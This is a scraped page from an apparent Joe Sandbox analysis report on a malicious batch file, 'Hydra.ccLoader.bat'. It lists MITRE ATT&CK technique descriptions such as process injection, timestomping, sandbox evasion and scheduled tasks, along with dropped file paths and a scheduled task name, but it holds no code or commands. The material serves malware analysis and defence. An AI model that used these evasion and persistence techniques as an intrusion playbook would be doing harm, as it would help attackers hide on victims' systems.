Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Hydra.ccLoader.bat

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\FB0D848F74F70BB2EAA93746D24D9749

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h1kok5rx.inc.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mkjrnls2.h3y.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ol4bbblw.uff.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y0mcdtjk.eg1.ps1

C:\Windows\$nya-onimai2\$nya-Onimai.bat (copy)

C:\Windows\$nya-onimai2\MzWhoQ.exe

C:\Windows\$rbx-onimai2\$rbx-CO2.bat

C:\Windows\System32\Tasks\$nya-iM0vfZcH

C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

\Device\Null

Static File Info

Windows Analysis Report
Hydra.ccLoader.bat

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre